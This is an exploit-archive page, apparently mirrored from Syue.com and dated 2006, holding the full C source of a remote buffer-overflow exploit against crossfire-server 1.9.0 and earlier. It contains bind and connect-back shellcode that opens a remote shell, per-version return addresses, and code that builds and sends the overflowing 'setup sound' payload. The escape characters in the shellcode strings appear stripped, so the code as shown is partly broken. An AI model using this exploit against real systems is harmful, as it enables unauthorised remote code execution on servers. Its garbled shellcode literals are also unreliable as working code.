crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit
# Published : 2006-03-13
# Author : landser
# Previous Title : BomberClone < 0.11.6.2 (Error Messages) Remote Buffer Overflow Exploit
# Next Title : Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote http://shinui.org.il
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host

unsigned char sc_cb[] = // izik's
	"x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcd"
	"x80x5bx5dxbeHOSTxf7xd6x56x66xbdPRx0fxcdx09xdd"
	"x55x43x6ax10x51x50xb0x66x89xe1xcdx80x87xd9"
	"x5bxb0x3fxcdx80x49x79xf9xb0x0bx52x68x2fx2f"
	"x73x68x68x2fx62x69x6ex89xe3x52x53xebxdf";

unsigned char sc_bind[] = // izik's
	"x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcd"
	"x80x5bx5dx52x66xbdPRx0fxcdx09xddx55x6ax10x51"
	"x50x89xe1xb0x66xcdx80xb3x04xb0x66xcdx80x5f"
	"x50x50x57x89xe1x43xb0x66xcdx80x93xb0x02xcd"
	"x80x85xc0x75x1ax59xb0x3fxcdx80x49x79xf9xb0"
	"x0bx68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52"
	"x53xebxb2x6ax06x58xcdx80xb3x04xebxc9";

struct {
	const char *type;
	unsigned char *code;
} shellcodes[] = {
	{"bind",		sc_bind},
	{"connectback",		sc_cb},
};

struct {
	const char *ver;
	unsigned long ret; // a "jmp *%eax" instruction
	unsigned short int len;
} targets[] = {
	{"crossfire-server_1.6.0.dfsg.1-4_i386.deb",	0x080d6f48, 0x1028},
	{"crossfire-server_1.8.0-2_i386.deb",		0x080506d7, 0x1130},
	{"crossfire-server_1.9.0-1_i386.deb",		0x0807aefa, 0x1130},
	{"crash",					0xcccccccc, 0x1300},
};

#define structsize(x) (sizeof x / sizeof x[0])

int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];

void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);

int main (int argc, char **argv) {
	int port = 0; // default value
	unsigned short int sc_port = 0;
	char *sc_host = NULL;

	printf("cf190.c by landser - ihsahn at gmail comnn");

	char c;
	while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
		switch (c) {
			case 's': sc = shellcodes[atoi(optarg)].code; break;
			case 'h': sc_host = strdup(optarg); break;
			case 'd': sc_port = atoi(optarg); break;
			case 't': n = atoi(optarg); break;
			case 'p': port = atoi(optarg); break;
			case '?': usage(argv[0]); return EXIT_FAILURE;
		}
	}

	if ((n < 0) || (n >= structsize(targets))) {
		printf("invalid targetn");
		usage(argv[0]);
		return EXIT_FAILURE;
	}
	
	if ((optind + 1) != argc) {
		printf("no hostnamen");
		usage(argv[0]);
		return EXIT_FAILURE;
	}

	establish(argv[optind], port ? port : PORT);
	
	update(sc, sc_port, sc_host);
       
	writebuf();

	printf("> sendingn");

	if (send(s, buf, targets[n].len + 2, 0) < 0) {
		perror("send()");
		return EXIT_FAILURE;
	}
	usleep(100000);

	printf("> donen");
	
	close(s);

	return EXIT_SUCCESS;
}

void establish (char *ip, int port) {
	struct sockaddr_in sa;
	struct hostent *h;

	if (!(h = gethostbyname(ip))) {
		herror("gethostbyname()");
		exit(EXIT_FAILURE);
	}
	printf("> resolved %s to %sn", ip,
			inet_ntoa(**((struct in_addr **)h->h_addr_list)));
	
	sa.sin_family = AF_INET;
	sa.sin_port = htons(port);
	sa.sin_addr = **((struct in_addr **)h->h_addr_list);
	
	if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket()");
		exit(EXIT_FAILURE);
	}

	if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
		perror("connect()");
		exit(EXIT_FAILURE);
	}

	printf ("> connected to %s:%d.n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}

void usage (char *argv0) {
	int i;
	
	printf("usage: %s -t <target> [-s <shellcode>] "
			"[-d <connectback/bind port] [-h <connectback ip>] "
			"host [-p <port>]n", argv0);

	printf("- targets:n");
	for (i=0;i<structsize(targets);i++)
		printf("%d. %sn", i, targets[i].ver);

	printf("- shellcodes: (default 0)n");
	for (i=0;i<structsize(shellcodes);i++)
		printf("%d. %sn", i, shellcodes[i].type);
}

void update (unsigned char *code, int port, char *host) {
	if (!port) port = SC_PORT;
	
	if (!(port & 0xff) || !((port >> 8) & 0xff)) {
		printf("bad cb portn");
		exit(EXIT_FAILURE);
	}
	*(unsigned short int *)(strstr(code, "PR")) = port;

	if (strstr(code, "HOST")) {
		in_addr_t inaddr;

		if (!host) host = SC_HOST;
		inaddr = inet_addr(host);
		
		if (inaddr == INADDR_NONE || strstr(host, "255")) {
			// ~(255) is 0
			printf("invalid cb hostnamen");
			exit(EXIT_FAILURE);
		}
		*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
	}
	
	if (host) free(host);
}
	
void writebuf (void) {
	unsigned char *ptr = buf;
	
	memset(buf, 0x90, sizeof buf);

	*ptr++ = (targets[n].len>> 8) & 0xff;
	*ptr++ = targets[n].len & 0xff;
	
	memcpy(ptr, "setup sound ", strlen("setup sound "));
	ptr += strlen("setup sound ");
	
	ptr += 120; // leave 120 nops before the shellcode
	memcpy(ptr, sc, strlen(sc));
	
	ptr = &buf[targets[n].len - 10];
	*(unsigned long *)ptr = targets[n].ret;
}

// www.Syue.com [2006-03-13]